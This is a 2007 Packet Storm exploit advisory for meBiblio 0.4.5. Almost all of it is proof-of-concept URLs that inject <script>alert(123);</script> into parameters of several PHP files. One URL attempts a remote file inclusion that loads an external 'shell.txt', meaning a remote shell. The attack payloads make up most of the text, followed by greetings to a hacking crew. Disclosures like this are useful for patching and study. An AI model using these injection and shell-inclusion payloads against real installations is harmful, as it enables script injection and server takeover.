meBiblio-xss.txt

2007-11-26T00:00:00
ID PACKETSTORM:61115
Type packetstorm
Reporter ShAy6oOoN
Modified 2007-11-26T00:00:00

Description

                                        
                                            `~~~~~~~~~~~~~~~~~~~~~~~~  
~ meBiblio 0.4.5 XSS ~  
~~~~~~~~~~~~~~~~~~~~~~~~  
  
---------------------  
Author : ShAy6oOoN  
---------------------  
Group : PitBull Crew  
---------------------  
Script : meBiblio 0.4.5  
---------------------  
Download : http://downloads.sourceforge.net/mebiblio/meBiblio-0.4.5.tar.gz?modtime=1195237984&big_mirror=0  
---------------------  
Vulnerability Type : Cross Site Scripting  
---------------------  
Register_globals : On  
---------------------  
  
http://localhost/path/add_class_mask.inc.php?InsertJournal=<script>alert(123);</script>  
  
http://localhost/path/add_journal_mask.inc.php?InsertJournal=<script>alert(123);</script>   
  
http://localhost/path/index.php?action=<script>alert(123);</script>   
  
http://localhost/path/index.php?action=http://localhost/shell.txt?   
  
http://localhost/path/insert_mask.inc.php?InsertBibliography=<script>alert(123);</script>   
  
http://localhost/path/insert_mask.inc.php?LabelAuthor=<script>alert(123);</script>   
  
http://localhost/path/insert_mask.inc.php?LabelOthers=<script>alert(123);</script>   
  
http://localhost/path/insert_mask.inc.php?LabelTitle=<script>alert(123);</script>   
  
http://localhost/path/insert_mask.inc.php?LabelJournal=<script>alert(123);</script>   
  
http://localhost/path/newClass.inc.php?InsertJournal=<script>alert(123);</script>   
  
http://localhost/path/newJournal.inc.php?InsertJournal=<script>alert(123);</script>  
  
---------------------  
Register_globals : Off  
---------------------  
  
http://localhost/path/dbadd.inc.php?which=<script>alert(123);</script>   
  
  
Greetings:  
----------  
  
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r - Inphex  
  
  
Thanks To:  
----------  
  
packetstormsecurity.org`